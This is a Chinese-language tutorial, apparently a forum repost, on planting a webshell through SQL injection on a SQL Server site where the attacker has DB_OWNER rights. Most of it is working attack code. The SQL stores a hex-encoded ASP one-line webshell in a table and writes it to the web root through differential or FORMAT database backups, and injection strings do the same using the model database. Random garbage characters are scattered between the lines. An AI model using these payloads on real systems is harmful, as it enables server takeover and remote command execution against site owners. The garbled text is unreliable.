DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

8 ?' b9 m; O+ R+ u/ Q减少备份文件大小，得到可执行的webshell成功率提高不少
  ^5 S! p" D' `' D7 I- z5 P一利用差异备份
; u9 z4 N& J5 O$ r加一个参数WITH DIFFERENTIAL

1
2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
. O+ ~' o  n1 R6 D- D- {1 Y6 hcreate table [dbo].[xiaolu] ([cmd] [image]);
" w. B; ^( P8 x! ~' w* a* @# uinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT
7 ]2 ]7 O- ~7 G: r" F. T9 r加一个参数WITH FROMAT
. \8 Y. y; N, A/ ~; g" V有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
( Q9 b# K0 `8 b7 m: \
1
2
* c) f6 B9 g. D, z9 o# h3
) i* x% |# M- W, T# r4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
$ J" `5 {# C: ^% E- o  ucreate table [dbo].[xiaolu] ([cmd] [image]);
4 }: L" I4 u5 a. A) e! ?insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
# x1 V" @  C) J# S. {
; ^; G" {+ F( R" `0 ?* G- W总的来说就是那么简单几句,下面以备份数据库model为例子
1

4 Q8 B5 q( ^, t2 o( w$ x1
: Z( B" s: s& z id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
! V& Y4 f7 A; S& j) n, A( o
  L; k/ B- V8 ~2
$ D9 i# A  K* P5 V3 N6 U' u* \- n
- K  B1 M$ j" x  _  ~1
id=1;backup database model to disk='你的路径‘ with differential,format;--
) m$ J! p0 [! }% X